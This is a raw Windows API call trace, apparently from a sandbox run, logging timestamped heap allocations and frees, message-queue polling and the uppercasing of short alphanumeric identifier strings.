RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0190.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0190.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0190.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x5d75) returned 0x24dd7d8 [0190.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0190.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0190.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0190.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0190.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0190.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0190.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0190.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0190.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0190.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0190.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0190.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0190.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0190.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0190.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0190.257] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0190.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0190.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0190.258] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0190.258] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0190.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0190.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0190.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0190.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0190.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0190.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0190.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0190.268] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0190.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0190.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0190.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0190.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0190.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0190.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0190.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0190.268] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0190.268] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0190.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0190.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0190.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0190.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0190.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0190.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0190.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0190.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0190.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0190.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0190.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0190.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0190.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0190.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0190.269] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0190.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0190.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0190.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0190.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0190.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0190.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0190.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0190.270] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0190.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0190.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0190.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0190.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0190.270] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0190.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0190.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0190.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0190.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0190.270] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0190.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0190.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0190.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0190.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0190.271] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.271] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0190.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0190.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0190.271] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.271] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0190.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0190.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0190.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0190.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0190.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0190.271] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0190.271] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.271] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0190.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0190.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.272] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.272] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0190.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0190.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0190.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0190.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0190.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.272] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0190.272] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0190.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0190.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0190.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0190.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0190.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0190.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0190.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0190.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0190.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0190.273] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0190.273] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.273] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0190.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0190.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0190.273] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.273] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0190.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0190.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0190.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0190.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0190.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0190.274] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0190.274] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0190.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0190.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0190.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0190.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0190.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0190.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0190.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0190.274] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0190.274] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0190.274] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0190.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0190.275] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.275] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0190.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0190.275] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0190.275] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.275] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0190.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.275] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0190.275] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0190.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0190.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0190.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0190.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0190.275] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.276] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0190.276] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0190.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0190.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0190.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0190.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0190.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0190.276] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0190.276] 